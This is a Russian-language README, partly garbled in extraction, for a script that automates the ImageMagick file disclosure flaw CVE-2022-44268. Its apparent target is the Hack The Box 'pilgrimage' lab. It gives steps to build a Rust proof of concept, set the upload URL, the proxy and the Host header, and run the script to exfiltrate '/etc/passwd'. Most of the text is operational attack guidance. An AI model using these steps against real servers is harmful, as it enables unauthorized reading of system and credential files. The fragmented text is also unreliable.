
Сценарий автоматизации эксплойтов, основанный на работе Voidzone security.
Этот скрипт автоматизирует эксплуатацию CVE-2022-44268 (раскрытие файлов ImageMagick).
image.png).exiftool для извлечения и вывода содержимого эксфильтрованного файла.requests: pip install requestshttps://git.rotfl.io/v/CVE-2022-44268.gitcargo build в его директории.exiftool.wget.git clone https://git.rotfl.io/v/CVE-2022-44268.gitcd CVE-2022-44268cargo buildautomate_exploit.py) ВНУТРЬ директории CVE-2022-44268.Вы ДОЛЖНЫ отредактировать Python-скрипт (automate_exploit.py) под вашу цель. Ключевые переменные для изменения:
payload: Путь к вредоносному image.png, созданному Rust PoC.
"/home/kali/usr/htb/pilgrimage/CVE-2022-44268/image.png""image.png" (поскольку скрипт запускается там, где создается image.png).url: Целевой URL для загрузки изображения.
"http://pilgrimage.htb""http://vulnerable-site.com/upload").proxies (опционально): Для маршрутизации трафика (например, через Burp Suite).
{'http': 'http://127.0.0.1:8080'}None, если не требуется.Заголовок Host (внутри словаря headers): Должен соответствовать имени хоста в вашем url.
'Host': 'pilgrimage.htb'Убедитесь, что вы находитесь в директории CVE-2022-44268 (где находятся automate_exploit.py и Rust PoC).
Запустите скрипт, указав путь к целевому файлу для эксфильтрации в качестве аргумента:
python3 automate_exploit.py "/etc/passwd"